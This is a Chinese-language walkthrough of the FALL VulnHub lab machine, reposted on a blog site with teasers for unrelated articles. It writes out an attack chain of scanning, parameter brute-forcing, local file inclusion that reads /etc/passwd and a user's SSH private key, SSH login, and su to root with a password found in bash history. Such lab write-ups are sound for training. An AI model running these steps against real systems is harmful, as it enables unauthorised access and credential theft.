FALL靶机攻略

1.下载靶机,导入靶机

下载地址:https://download.vulnhub.com/digitalworld/FALL.7z

开启靶机。

2. 靶机、kali设置NAT网卡模式

3. kali扫描NAT网卡段的主机

kali主机

nmap扫描:nmap 192.168.92.1/24

判断出靶机ip是192.168.92.133。开启端口:22、80、139、443、445、3306、9090。

4. 访问开启的端口

80端口,页面是一些消息。

在多条消息记录中,多次发现Posted:qiu。猜测“qiu”可能是一个用户。

139端口被限制,无法访问

9090发现服务器登录框,但无数据登录

5. 扫描敏感目录

 dirsearch -u "http://192.168.92.133"

发现多个页面,/admin/login.php、/assets/、config.php、phpinfo.php、robots.txt、test.php。

6. 访问网页

/assets/,发现目录,但里面没有任何信息        /phpinfo.php、/config.php  页面无显示

/robots.txt  无敏感信息

/test.php页面,弹窗显示:缺少GET传参。说明这里存在注入。尝试寻找参数。

查看网页源代码发现没有。

7.爆破/test.php页面的参数

使用kali的wfuzz工具可以爆破,同时wfuzz自带字典。

在/usr/share/wfuzz/wordlist/general目录下存在多个字典,这里使用big.txt。

cat big.txt

爆破参数:

wfuzz -u "http://192.168.92.133/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80

爆破出payload结果为:file

8. 利用file参数 查看文件/etc/passwd

http://192.168.92.133/test.php?file=/etc/passwd

发现 /bin/bash  可登录用户  只有root  和  qiu ,这里证明之前看到的qiu的确是用户。

9.  查看qiu的 ssh 密钥

http:/192.168.92.133/test.php?file=/home/qiu/.ssh/id_rsa

10. 将ssh连接私钥的页面内容下载到kali

输入:curl http:/192.168.92.133/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa

11.利用用户qiu和ssh私钥进行连接靶机

查看文件权限:ls -l   发现id_rsa文件没有执行权限

远程连接:ssh -i id_rsa qiu@192.168.92.133

但这里warning说,私钥不能被其他人使用  

所以修改权限,只有其拥有者才有权限,其他人无权限。即600

修改私钥文件权限:chmod 600 id_rsa            【

【600:即 - rw- --- ---】【用户有:rw- , 属组和其他人均无任何权限---】

再次连接:

ssh -i id_rsa qiu@192.168.92.133   连接成功

执行whoami命令,发现是qiu

12.查看历史命令,寻找其他敏感信息

cat .bash_history

竟然发现  sudo  强行提权的信息,存在可疑密码“remarkablyawesomE”

利用这个疑似密码,尝试提权

输入:su - root,密码:remarkablyawesomE

提权成功,执行whoami,得到是root用户。

FALL靶机练习结束!!!

温馨拓展:FALL 有 秋天 的意思哦!!!  金黄的树叶、赤红的枫叶,秋天的风景不错呦。

    这次靶机,开局很轻松,ip很容易扫描出来,但给的目录很多,解决方法或许也很多。但本人参考其他攻略,按这种方法练习下来。仅供参考。。。希望有所帮助。

                                                                                                    --------------------2025/3/27  21:41

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/41948.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

蓝桥杯高频考点——二分(含C++源码)

二分 基本框架整数查找(序列二分的模版题 建议先做)满分代码及思路solution 子串简写满分代码及思路solution 1(暴力 模拟双指针70分)solution 2(二分 AC) 管道满分代码及思路样例解释与思路分析solution 最…

Rust vs. Go: 性能测试(2025)

本内容是对知名性能评测博主 Anton Putra Rust vs. Go (Golang): Performance 2025 内容的翻译与整理, 有适当删减, 相关数据和结论以原作结论为准。 再次对比 Rust 和 Go,但这次我们使用的是最具性能优势的 HTTP 服务器库---Hyper,它基于 Tokio 异步运…

【NUUO 摄像头】(弱口令登录漏洞)

漏洞简介:NUUO 是NUUO公司的一款小型网络硬盘录像机设备。 NUUO NVRMini2 3.0.8及之前版本中存在后门调试文件。远程攻击者可通过向后门文件handle_site_config.php发送特定的请求利用该漏洞执行任意命令。 1.Fofa搜索语句: 在Fofa网站,搜索&…

PyQt6实例_批量下载pdf工具_exe使用方法

目录 前置: 工具使用方法: step one 获取工具 step two 安装 step three 使用 step four 卸载 链接 前置: 1 批量下载pdf工具是基于博文 python_巨潮年报pdf下载-CSDN博客 ,将这个需求创建成界面应用,达到可…

matlab 模拟 闪烁体探测器全能峰

clc;clear;close all %% 参数设置 num_events 1e5; % 模拟事件数 E 662e3; % γ射线能量(eV) Y 38000; % 光产额(photon/MeV,NaI(Tl)) eta 0.2; % 量子效率 G 1e6; …

启扬RK3568开发板已成功适配OpenHarmony4.0版本

启扬智能IAC-RK3568-Kit开发板支持Debian、Android等常见开源操作系统,目前已完成OpenHarmony4.0开源国产操作系统的适配工作,满足国产化开源操作系统客户的需求。 启扬智能IAC-RK3568-Kit开发板基于瑞芯微RK3568处理器设计,主频最高可达2.0G…

蓝桥与力扣刷题(蓝桥 山)

题目:这天小明正在学数数。 他突然发现有些止整数的形状像一挫 “山”, 比㓚 123565321、145541123565321、145541, 它 们左右对称 (回文) 且数位上的数字先单调不减, 后单调不增。 小朋数了衣久也没有数完, 他惒让你告诉他在区间 [2022,2022222022] 中有 多少个数…

WinDbg. From A to Z! 笔记(一)

原文链接: WinDbg. From A to Z! 文章目录 为什么使用WinDbg为什么通过本书学习底层原理简述Windows的调试工具一览dbghelp.dll -- Windows 调试助手dbgeng.dll -- 调试引擎接口 调试符号 (Debug Symbols)有哪些调试信息生成调试信息匹配调试信息调用堆栈 侵入式与非侵入式异常…

Axure RP 9.0教程: 基于动态面板的元件跟随来实现【音量滑块】

文章目录 引言I 音量滑块的实现步骤添加底层边框添加覆盖层基于覆盖层创建动态面板添加滑块按钮设置滑块拖动效果引言 音量滑块在播放器类APP应用场景相对较广,例如调节视频的亮度、声音等等。 I 音量滑块的实现步骤 添加底层边框 在画布中添加一个矩形框:500 x 32,圆…

Eclipse IDE for ModusToolbox™ 3.4环境通过JLINK调试CYT4BB

使用JLINK在Eclipse IDE for ModusToolbox™ 3.4环境下调试CYT4BB,配置是难点。总结一下在IDE中配置JLINK调试中遇到的坑,以及如何一步一步解决遇到的问题。 1. JFLASH能够正常下载程序 首先要保证通过JFLASH(我使用的J-Flash V7.88c版本)能够通过JLIN…

黑马点评项目

遇到问题: 登录流程 session->JWT->SpringSession->tokenRedis (不需要改进为SpringSession,token更广泛,移动端或者前后端分离都可以用) SpringSession配置为redis模式后,redis相当于分布式se…

wgcloud怎么实现服务器或者主机的远程关机、重启操作吗

可以,WGCLOUD的指令下发模块可以实现远程关机和重启 使用指令下发模块,重启主机,远程关机,重启agent程序- WGCLOUD

深度解析Spring Boot可执行JAR的构建与启动机制

一、Spring Boot应用打包架构演进 1.1 传统JAR包与Fat JAR对比 传统Java应用的JAR包在依赖管理上存在明显短板,依赖项需要单独配置classpath。Spring Boot创新的Fat JAR(又称Uber JAR)解决方案通过spring-boot-maven-plugin插件实现了"…

deepseek(2)——deepseek 关键技术

1 Multi-Head Latent Attention (MLA) MLA的核心在于通过低秩联合压缩来减少注意力键(keys)和值(values)在推理过程中的缓存,从而提高推理效率: c t K V W D K V h t c_t^{KV} W^{DKV}h_t ctKV​WDKVht​…

突破反爬困境:SDK架构设计,为什么选择独立服务模式(四)

声明 本文所讨论的内容及技术均纯属学术交流与技术研究目的,旨在探讨和总结互联网数据流动、前后端技术架构及安全防御中的技术演进。文中提及的各类技术手段和策略均仅供技术人员在合法与合规的前提下进行研究、学习与防御测试之用。 作者不支持亦不鼓励任何未经授…

自然语言处理,能否成为人工智能与人类语言完美交互的答案?

自然语言处理(NLP)作为人工智能关键领域,正深刻改变着人机交互模式。其发展历经从早期基于规则与统计,到如今借深度学习实现飞跃的历程。NLP 涵盖分词、词性标注、语义理解等多元基础任务,运用传统机器学习与前沿深度学…

蓝桥杯备考:八皇后问题

八皇后的意思是&#xff0c;每行只能有一个&#xff0c;每个对角线只能有一个&#xff0c;每一列只能有一个&#xff0c;我们可以dfs遍历每种情况&#xff0c;每行填一个&#xff0c;通过对角线和列的限制来进行剪枝 话不多说&#xff0c;我们来实现一下代码 #include <ios…

HDR(HDR10/ HLG),SDR

以下是HDR&#xff08;HDR10/HLG&#xff09;和SDR的详细解释&#xff1a; 1. SDR&#xff08;Standard Dynamic Range&#xff0c;标准动态范围&#xff09; • 定义&#xff1a;SDR是传统的动态范围标准&#xff0c;主要用于8位色深的视频显示&#xff0c;动态范围较窄&…

【MySQL】验证账户权限

在用户进行验证之后&#xff0c;MySQL将提出以下问题验证账户权限&#xff1a; 1.谁是当前用户&#xff1f; 2.该用户有何权限&#xff1f; 管理权限比如&#xff1a;shutdown、replication slave、load data infile。数据权限比如&#xff1a;select、insert、update、dele…

通过TIM+DMA Burst 实现STM32输出变频且不同脉冲数量的PWM波形

Burst介绍&#xff1a; DMA控制器可以生成单次传输或增量突发传输&#xff0c;传输的节拍数为4、8或16。 为了确保数据一致性&#xff0c;构成突发传输的每组传输都是不可分割的&#xff1a;AHB传输被锁定&#xff0c;AHB总线矩阵的仲裁器在突发传输序列期间不会撤销DMA主设备…